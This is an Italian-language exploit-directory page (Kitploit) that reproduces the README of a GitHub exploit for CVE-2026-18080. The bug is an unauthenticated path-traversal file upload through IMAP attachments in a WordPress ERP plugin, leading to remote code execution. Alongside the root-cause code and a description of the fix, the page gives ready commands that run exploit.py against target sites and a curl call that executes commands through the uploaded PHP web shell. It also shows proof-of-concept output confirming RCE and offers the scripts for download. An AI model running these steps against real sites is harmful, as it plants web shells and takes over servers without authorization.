Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
By-Poloss..-..CVE-2026-18080 — # Exploit per CVE-2026-18080 Exploit per CVE-2026-18080, un upload arbitrario di file non autenticato che porta a RCE in ERP Complete HR, Accounting & CRM Suite. Include script Python e PHP per lo sfruttamento automatizzato. | Kitploit
Strumenti/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

# Exploit per CVE-2026-18080 Exploit per CVE-2026-18080, un upload arbitrario di file non autenticato che porta a RCE in ERP Complete HR, Accounting & CRM Suite. Include script Python e PHP per lo sfruttamento automatizzato.

Vedi Repository
820 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

Caricamento Arbitrario di File Non Autenticato tramite Allegato IMAP di CRM Email Connect (Path Traversal → RCE)

CampoValore
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
Patchhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Critico)
CWECWE-434 (Caricamento Senza Restrizioni di File con Tipo Pericoloso)
InteressatiVersioni del plugin ERP <= 1.17.7 (corretto nella 1.17.8)

Descrizione

La funzione save_attachments() del plugin ERP in GmailSync.php elabora gli allegati email in arrivo da IMAP senza normalizzazione del percorso. Un attaccante può creare un'email con un nome file come ../../plugins/shell.php e un'intestazione References contraffatta che corrisponde al modello previsto dal plugin. Il processo cron di sincronizzazione IMAP scrive il file al di fuori della directory crm-attachments/ protetta da .htaccess in qualsiasi percorso scrivibile sotto wp-content/.

Causa Principale

In GmailSync.php (v1.17.7):

root@kitploit:~
$name = $item['name'];              // Nessuna basename() o normalizzazione del percorso
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

Il nome file ../../plugins/shell.php concatenato con $dir (wp-content/uploads/crm-attachments/) si risolve in wp-content/plugins/shell.php — una directory in cui è consentita l'esecuzione di PHP.

La correzione (v1.17.8) aggiunge sanitize_attachment_filename() che rimuove i componenti di directory tramite basename(), rifiuta i separatori di percorso e blocca le estensioni pericolose.

Sfruttamento

Metodo 1: Diretto (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

Metodo 2: Percorso personalizzato e nome shell

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

Metodo 3: Sonda phpinfo

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

Dopo il caricamento riuscito:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

Prova di Concetto

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

File

FileDescrizione
exploit.pyScript di exploit Python che utilizza wp-cli
exploit.phpExploit PHP autonomo per wp eval-file
README.mdQuesto file
Scarica lo strumento